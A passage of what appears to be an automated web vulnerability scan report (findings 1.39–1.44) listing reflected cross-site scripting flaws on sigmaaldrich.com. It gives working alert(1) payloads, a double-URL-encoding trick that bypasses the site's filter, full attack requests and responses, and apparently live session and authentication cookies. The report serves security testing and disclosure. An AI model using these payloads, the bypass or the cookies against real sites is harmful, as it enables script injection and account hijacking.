WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:08 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/author/site-level873ad";alert(1)//83dd3b63e22/mobile.html","E404") ;
   </script>
...[SNIP]...

1.39. http://www.sigmaaldrich.com/author/site-level/mobile.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /author/site-level/mobile.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb38a%2522%253balert%25281%2529%252f%252fda771394f7e was submitted in the REST URL parameter 3. This input was echoed as eb38a";alert(1)//da771394f7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /author/site-level/mobile.htmleb38a%2522%253balert%25281%2529%252f%252fda771394f7e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:10 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/author/site-level/mobile.htmleb38a";alert(1)//da771394f7e","E404") ;
   </script>
...[SNIP]...

1.40. http://www.sigmaaldrich.com/catalog/Lookup.do [F parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /catalog/Lookup.do

Issue detail

The value of the F request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4d81'-alert(1)-'d59568379a8 was submitted in the F parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PRc4d81'-alert(1)-'d59568379a8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sigmaaldrich.com
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 18:06:01 GMT
Connection: close
Set-Cookie: JSESSIONID=3E41DB1598B528ABFE9A0997CD00C873.stltcat02b; Path=/catalog
Content-Length: 46377


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
   <head>    
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
   
       
   <TITLE>Search Results</TITLE>

   
...[SNIP]...
<script type="text/javascript">
   var selectTab='PRc4d81'-alert(1)-'d59568379a8';
   if(selectTab=='PR'){
       productResultSelected();
   }
   else if(selectTab=='TD'){
       techDocSelected();
   }
   else if(selectTab=='SC'){
       siteContentSelected();
   }
   else if(selectTab=='AA'){
       AnalAppSele
...[SNIP]...

1.41. http://www.sigmaaldrich.com/catalog/Lookup.do [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /catalog/Lookup.do

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c7ff%2522%253balert%25281%2529%252f%252fb2ff7a30651 was submitted in the REST URL parameter 1. This input was echoed as 1c7ff";alert(1)//b2ff7a30651 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /catalog1c7ff%2522%253balert%25281%2529%252f%252fb2ff7a30651/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sigmaaldrich.com
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:08 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28921


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/catalog1c7ff";alert(1)//b2ff7a30651/Lookup.do","E404") ;
   </script>
...[SNIP]...

1.42. http://www.sigmaaldrich.com/catalog/search/SearchResultsPage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /catalog/search/SearchResultsPage

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3d7%2522%253balert%25281%2529%252f%252f2cbd6686cf8 was submitted in the REST URL parameter 1. This input was echoed as 1d3d7";alert(1)//2cbd6686cf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /catalog1d3d7%2522%253balert%25281%2529%252f%252f2cbd6686cf8/search/SearchResultsPage?Query=%60&Scope=SearchAll HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sigmaaldrich.com
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:28 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28936


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/catalog1d3d7";alert(1)//2cbd6686cf8/search/SearchResultsPage","E404") ;
   </script>
...[SNIP]...

1.43. http://www.sigmaaldrich.com/chemistry.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69f7e%2522%253balert%25281%2529%252f%252fd5ddcb5ca40 was submitted in the REST URL parameter 1. This input was echoed as 69f7e";alert(1)//d5ddcb5ca40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /69f7e%2522%253balert%25281%2529%252f%252fd5ddcb5ca40 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:14 GMT
Content-Length: 28904
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/69f7e";alert(1)//d5ddcb5ca40","E404") ;
   </script>
...[SNIP]...

1.44. http://www.sigmaaldrich.com/chemistry/chemical-synthesis.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3111%2522%253balert%25281%2529%252f%252f60a8b7870b7 was submitted in the REST URL parameter 1. This input was echoed as d3111";alert(1)//60a8b7870b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryd3111%2522%253balert%25281%2529%252f%252f60a8b7870b7/chemical-synthesis.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:16 GMT
Content-Length: 28937
Connection: close
